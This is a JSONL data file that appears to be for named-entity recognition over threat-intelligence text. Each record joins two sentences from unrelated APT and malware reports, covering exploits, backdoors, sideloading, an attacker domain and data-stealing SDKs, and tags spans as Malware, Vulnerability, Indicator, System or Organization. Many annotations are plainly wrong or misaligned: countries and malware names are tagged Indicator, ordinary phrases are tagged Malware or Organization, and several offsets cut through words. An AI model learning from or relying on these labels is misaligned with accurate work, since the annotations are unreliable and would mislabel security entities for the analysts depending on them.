{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia .", "spans": [{"start": 21, "end": 45, "label": "Malware"}, {"start": 74, "end": 138, "label": "Vulnerability"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 195, "end": 200, "label": "Indicator"}]}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 133, "end": 138, "label": "Indicator"}]}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month .", "spans": [{"start": 5, "end": 18, "label": "Malware"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 286, "end": 294, "label": "Organization"}, {"start": 377, "end": 383, "label": "Indicator"}]}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 151, "end": 161, "label": "Indicator"}, {"start": 176, "end": 179, "label": "Indicator"}]}
{"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 64, "end": 74, "label": "Malware"}, {"start": 88, "end": 105, "label": "Malware"}, {"start": 120, "end": 128, "label": "System"}, {"start": 186, "end": 195, "label": "Malware"}, {"start": 198, "end": 200, "label": "Indicator"}]}
{"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart .", "spans": [{"start": 59, "end": 65, "label": "Malware"}, {"start": 70, "end": 95, "label": "Malware"}, {"start": 144, "end": 153, "label": "Indicator"}, {"start": 180, "end": 197, "label": "Indicator"}]}
{"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 30, "end": 68, "label": "Malware"}, {"start": 71, "end": 101, "label": "Malware"}, {"start": 104, "end": 108, "label": "System"}, {"start": 123, "end": 133, "label": "Malware"}, {"start": 141, "end": 148, "label": "Indicator"}]}
{"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": [{"start": 4, "end": 19, "label": "Malware"}, {"start": 41, "end": 59, "label": "Malware"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 73, "end": 81, "label": "Malware"}, {"start": 88, "end": 93, "label": "Malware"}, {"start": 107, "end": 119, "label": "Malware"}, {"start": 122, "end": 131, "label": "Indicator"}, {"start": 301, "end": 303, "label": "System"}]}
{"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 106, "end": 146, "label": "Malware"}, {"start": 149, "end": 156, "label": "Indicator"}]}
{"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows ( Bartender ) , MacOS ( JukeBox ) and Linux ( DanceFloor ) .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 54, "end": 93, "label": "Malware"}, {"start": 143, "end": 154, "label": "Indicator"}, {"start": 325, "end": 332, "label": "System"}, {"start": 335, "end": 344, "label": "System"}, {"start": 349, "end": 354, "label": "System"}, {"start": 357, "end": 364, "label": "System"}, {"start": 379, "end": 389, "label": "System"}]}
{"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 .", "spans": [{"start": 13, "end": 25, "label": "Malware"}, {"start": 46, "end": 68, "label": "Malware"}, {"start": 95, "end": 123, "label": "Malware"}, {"start": 303, "end": 309, "label": "Indicator"}, {"start": 329, "end": 338, "label": "Indicator"}, {"start": 370, "end": 373, "label": "System"}]}
{"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process .", "spans": [{"start": 53, "end": 62, "label": "Malware"}, {"start": 71, "end": 89, "label": "Malware"}, {"start": 198, "end": 216, "label": "Indicator"}]}
{"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 51, "end": 69, "label": "Malware"}, {"start": 79, "end": 90, "label": "System"}, {"start": 99, "end": 115, "label": "Malware"}, {"start": 159, "end": 162, "label": "System"}, {"start": 201, "end": 206, "label": "Malware"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 304, "end": 309, "label": "Malware"}, {"start": 312, "end": 318, "label": "Malware"}, {"start": 321, "end": 327, "label": "Malware"}, {"start": 330, "end": 335, "label": "Malware"}, {"start": 338, "end": 344, "label": "Malware"}, {"start": 368, "end": 374, "label": "Organization"}, {"start": 417, "end": 424, "label": "Indicator"}, {"start": 476, "end": 479, "label": "System"}, {"start": 562, "end": 566, "label": "Indicator"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 159, "end": 171, "label": "Organization"}, {"start": 217, "end": 220, "label": "System"}, {"start": 270, "end": 283, "label": "Indicator"}, {"start": 314, "end": 317, "label": "System"}]}
{"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 17, "end": 20, "label": "System"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 54, "end": 74, "label": "Malware"}, {"start": 90, "end": 95, "label": "Indicator"}, {"start": 101, "end": 116, "label": "Malware"}, {"start": 181, "end": 189, "label": "Organization"}]}
{"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 .", "spans": [{"start": 66, "end": 84, "label": "Malware"}, {"start": 91, "end": 110, "label": "Malware"}, {"start": 137, "end": 143, "label": "Organization"}, {"start": 229, "end": 236, "label": "Indicator"}, {"start": 244, "end": 246, "label": "System"}]}
{"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 120, "end": 128, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 141, "end": 147, "label": "Malware"}, {"start": 150, "end": 168, "label": "Malware"}, {"start": 323, "end": 329, "label": "Indicator"}, {"start": 349, "end": 363, "label": "Vulnerability"}, {"start": 367, "end": 380, "label": "Vulnerability"}]}
{"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft \u2019s Equation Editor ( EQNEDT32 ) .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 37, "end": 44, "label": "Malware"}, {"start": 62, "end": 83, "label": "System"}, {"start": 138, "end": 147, "label": "Indicator"}, {"start": 168, "end": 181, "label": "Vulnerability"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 212, "end": 227, "label": "System"}, {"start": 230, "end": 238, "label": "System"}]}
{"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 29, "end": 35, "label": "Malware"}, {"start": 86, "end": 93, "label": "Organization"}, {"start": 172, "end": 175, "label": "Indicator"}, {"start": 191, "end": 198, "label": "Vulnerability"}, {"start": 203, "end": 216, "label": "Vulnerability"}]}
{"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 .", "spans": [{"start": 52, "end": 57, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 287, "label": "Indicator"}, {"start": 400, "end": 411, "label": "System"}, {"start": 447, "end": 450, "label": "System"}]}
{"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Upon decrypting and executing , it drops two additional files wsc_proxy.exe\u201d (legitimate Avast executable) and a malicious DLL wsc.dll\u201d in the %TEMP% folder .", "spans": [{"start": 67, "end": 77, "label": "Malware"}, {"start": 92, "end": 105, "label": "Malware"}, {"start": 197, "end": 211, "label": "Indicator"}, {"start": 258, "end": 261, "label": "System"}, {"start": 262, "end": 270, "label": "Indicator"}]}
{"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) .", "spans": [{"start": 38, "end": 47, "label": "System"}, {"start": 50, "end": 52, "label": "Malware"}, {"start": 63, "end": 89, "label": "Malware"}, {"start": 249, "end": 257, "label": "Indicator"}, {"start": 305, "end": 312, "label": "Vulnerability"}, {"start": 315, "end": 328, "label": "Vulnerability"}]}
{"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . In addition , a current ANY.RUN playback of our observed Elise infection is also available .", "spans": [{"start": 33, "end": 42, "label": "Malware"}, {"start": 113, "end": 125, "label": "Malware"}, {"start": 186, "end": 193, "label": "Indicator"}, {"start": 219, "end": 224, "label": "Indicator"}]}
{"text": "Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 169, "end": 173, "label": "Malware"}, {"start": 252, "end": 256, "label": "System"}, {"start": 295, "end": 309, "label": "Vulnerability"}, {"start": 376, "end": 390, "label": "Indicator"}, {"start": 421, "end": 433, "label": "Indicator"}]}
{"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 19, "end": 35, "label": "Malware"}, {"start": 38, "end": 57, "label": "Malware"}, {"start": 60, "end": 74, "label": "Malware"}, {"start": 77, "end": 93, "label": "Malware"}, {"start": 96, "end": 107, "label": "Malware"}, {"start": 110, "end": 130, "label": "Malware"}, {"start": 133, "end": 140, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 273, "end": 280, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Vulnerability"}, {"start": 312, "end": 337, "label": "Indicator"}, {"start": 340, "end": 354, "label": "Indicator"}]}
{"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 29, "end": 42, "label": "Malware"}, {"start": 45, "end": 60, "label": "Malware"}, {"start": 63, "end": 76, "label": "Malware"}, {"start": 81, "end": 97, "label": "Malware"}, {"start": 403, "end": 413, "label": "Indicator"}, {"start": 428, "end": 447, "label": "Indicator"}]}
{"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 31, "end": 40, "label": "Malware"}, {"start": 72, "end": 87, "label": "Malware"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 264, "end": 272, "label": "Indicator"}]}
{"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe\u201d .", "spans": [{"start": 4, "end": 22, "label": "Malware"}, {"start": 71, "end": 80, "label": "Malware"}, {"start": 131, "end": 140, "label": "Indicator"}, {"start": 265, "end": 278, "label": "Indicator"}]}
{"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 111, "end": 124, "label": "Malware"}, {"start": 155, "end": 167, "label": "Malware"}, {"start": 302, "end": 310, "label": "Malware"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 388, "end": 399, "label": "Malware"}, {"start": 408, "end": 421, "label": "Malware"}]}
{"text": "This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 80, "end": 94, "label": "Malware"}, {"start": 130, "end": 156, "label": "Malware"}, {"start": 159, "end": 170, "label": "Malware"}, {"start": 207, "end": 216, "label": "Indicator"}]}
{"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file .", "spans": [{"start": 23, "end": 32, "label": "Malware"}, {"start": 69, "end": 79, "label": "Malware"}, {"start": 150, "end": 160, "label": "System"}, {"start": 182, "end": 192, "label": "System"}, {"start": 218, "end": 227, "label": "Indicator"}]}
{"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 15, "end": 21, "label": "Malware"}, {"start": 47, "end": 54, "label": "Malware"}, {"start": 270, "end": 278, "label": "Indicator"}, {"start": 297, "end": 303, "label": "System"}]}
{"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 42, "label": "Organization"}, {"start": 189, "end": 193, "label": "System"}, {"start": 202, "end": 209, "label": "System"}, {"start": 226, "end": 232, "label": "System"}, {"start": 257, "end": 278, "label": "Indicator"}, {"start": 287, "end": 313, "label": "Indicator"}, {"start": 316, "end": 342, "label": "Indicator"}, {"start": 349, "end": 374, "label": "Indicator"}]}
{"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 42, "label": "Organization"}, {"start": 125, "end": 143, "label": "Organization"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 246, "end": 253, "label": "System"}, {"start": 265, "end": 282, "label": "Indicator"}, {"start": 327, "end": 334, "label": "System"}]}
{"text": "The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d .", "spans": [{"start": 22, "end": 34, "label": "Organization"}, {"start": 85, "end": 97, "label": "Organization"}, {"start": 159, "end": 169, "label": "Indicator"}, {"start": 296, "end": 298, "label": "Indicator"}]}
{"text": "COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . we identified two methods to deliver the KerrDown downloader to targets .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 26, "end": 38, "label": "Organization"}, {"start": 82, "end": 100, "label": "Organization"}, {"start": 153, "end": 161, "label": "Indicator"}]}
{"text": "The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon .", "spans": [{"start": 46, "end": 87, "label": "Organization"}, {"start": 149, "end": 157, "label": "Indicator"}]}
{"text": "PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . While investigating KerrDown we found multiple RAR files containing a variant of the malware .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 22, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}, {"start": 59, "end": 69, "label": "Organization"}, {"start": 184, "end": 192, "label": "Indicator"}]}
{"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . The dropped PE file has the distinctive file name 8.t\u201d .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 27, "end": 40, "label": "Organization"}, {"start": 74, "end": 82, "label": "Organization"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 165, "end": 167, "label": "Malware"}, {"start": 203, "end": 207, "label": "Indicator"}]}
{"text": "Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware .", "spans": [{"start": 20, "end": 28, "label": "Organization"}, {"start": 37, "end": 49, "label": "Organization"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 135, "end": 153, "label": "Organization"}, {"start": 156, "end": 178, "label": "Organization"}, {"start": 181, "end": 192, "label": "Organization"}, {"start": 195, "end": 214, "label": "Organization"}, {"start": 221, "end": 228, "label": "Indicator"}]}
{"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . The malware starts communicating with the C&C server by sending basic information about the infected machine .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 28, "label": "Organization"}, {"start": 79, "end": 89, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 105, "end": 122, "label": "Organization"}, {"start": 129, "end": 136, "label": "Indicator"}, {"start": 167, "end": 170, "label": "System"}]}
{"text": "Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests .", "spans": [{"start": 36, "end": 41, "label": "Organization"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}, {"start": 144, "end": 159, "label": "Organization"}, {"start": 162, "end": 180, "label": "Organization"}, {"start": 189, "end": 200, "label": "Organization"}, {"start": 207, "end": 214, "label": "Indicator"}, {"start": 243, "end": 257, "label": "Malware"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 357, "end": 361, "label": "Indicator"}]}
{"text": "The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 32, "end": 44, "label": "Organization"}]}
{"text": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store .", "spans": [{"start": 36, "end": 46, "label": "Organization"}, {"start": 55, "end": 73, "label": "Organization"}, {"start": 115, "end": 118, "label": "Malware"}, {"start": 127, "end": 138, "label": "Indicator"}, {"start": 177, "end": 184, "label": "System"}, {"start": 254, "end": 267, "label": "Organization"}, {"start": 270, "end": 279, "label": "Organization"}, {"start": 282, "end": 298, "label": "Organization"}, {"start": 305, "end": 321, "label": "Organization"}]}
{"text": "Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers .", "spans": [{"start": 46, "end": 64, "label": "Organization"}, {"start": 93, "end": 103, "label": "Organization"}, {"start": 231, "end": 242, "label": "Indicator"}]}
{"text": "The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 108, "end": 114, "label": "Organization"}, {"start": 210, "end": 226, "label": "Organization"}, {"start": 280, "end": 286, "label": "Indicator"}]}
{"text": "These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in .", "spans": [{"start": 28, "end": 46, "label": "Organization"}, {"start": 199, "end": 226, "label": "System"}, {"start": 229, "end": 233, "label": "System"}, {"start": 358, "end": 369, "label": "Organization"}, {"start": 458, "end": 469, "label": "Indicator"}]}
{"text": "Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 38, "end": 56, "label": "Organization"}, {"start": 209, "end": 236, "label": "System"}, {"start": 239, "end": 243, "label": "System"}, {"start": 368, "end": 379, "label": "Organization"}, {"start": 432, "end": 443, "label": "Indicator"}, {"start": 465, "end": 472, "label": "System"}]}
{"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 184, "end": 202, "label": "Organization"}, {"start": 220, "end": 236, "label": "Indicator"}]}
{"text": "Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 75, "end": 87, "label": "System"}, {"start": 178, "end": 189, "label": "Indicator"}]}
{"text": "These VNC exectuables would either be included in the SFX file or downloaded by the batch script . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control .", "spans": [{"start": 6, "end": 9, "label": "System"}, {"start": 149, "end": 160, "label": "Indicator"}]}
{"text": "Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d .", "spans": [{"start": 47, "end": 58, "label": "Organization"}, {"start": 91, "end": 95, "label": "Organization"}, {"start": 241, "end": 252, "label": "Indicator"}]}
{"text": "The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 82, "end": 86, "label": "Organization"}, {"start": 200, "end": 212, "label": "Indicator"}]}
{"text": "Gorgon Group used common URL shortening services to download payloads . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 178, "end": 185, "label": "Indicator"}, {"start": 188, "end": 194, "label": "Indicator"}, {"start": 213, "end": 224, "label": "Indicator"}]}
{"text": "Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 165, "end": 177, "label": "Malware"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 318, "end": 330, "label": "Indicator"}]}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 183, "end": 195, "label": "Indicator"}]}
{"text": "This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics . Japan is no stranger to banking malware .", "spans": [{"start": 124, "end": 130, "label": "System"}, {"start": 159, "end": 183, "label": "Malware"}, {"start": 272, "end": 279, "label": "Indicator"}, {"start": 280, "end": 287, "label": "Indicator"}]}
{"text": "All contain the same Visual Basic macro code and author name as Honeybee . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware .", "spans": [{"start": 64, "end": 72, "label": "Organization"}, {"start": 151, "end": 157, "label": "Indicator"}, {"start": 162, "end": 169, "label": "Indicator"}]}
